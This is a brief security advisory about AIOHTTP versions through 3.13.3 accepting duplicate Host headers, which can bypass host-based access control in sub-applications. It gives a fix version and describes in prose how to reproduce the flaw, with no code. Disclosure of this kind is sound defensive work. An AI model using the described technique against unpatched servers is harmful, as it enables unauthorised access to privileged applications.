AIOHTTP Duplicate Host Header Vulnerability Allowing Potential Access Control Bypass

A vulnerability in AIOHTTP, an asynchronous HTTP client/server framework for Python, allows multiple Host headers in versions through 3.13.3. This could lead to a bypass of security checks in reverse proxies that rely on Host headers, potentially allowing requests to be processed in privileged sub-applications. The issue has been fixed in AIOHTTP version 3.13.4.

Impact

The vulnerability could cause a host-based access control bypass, allowing requests to be processed in a privileged sub-application.

Reproduction

The vulnerability can be reproduced by sending an HTTP request to a server using AIOHTTP version through 3.13.3 that includes duplicate Host headers. This can be done using a tool like cURL or Postman, or by writing a simple script that uses the AIOHTTP library to send the request. The server should be configured to use 'Application.add_domain()' to demonstrate the potential access control bypass.

Remediation

Users can upgrade to AIOHTTP version 3.13.4 or later, where this vulnerability has been patched.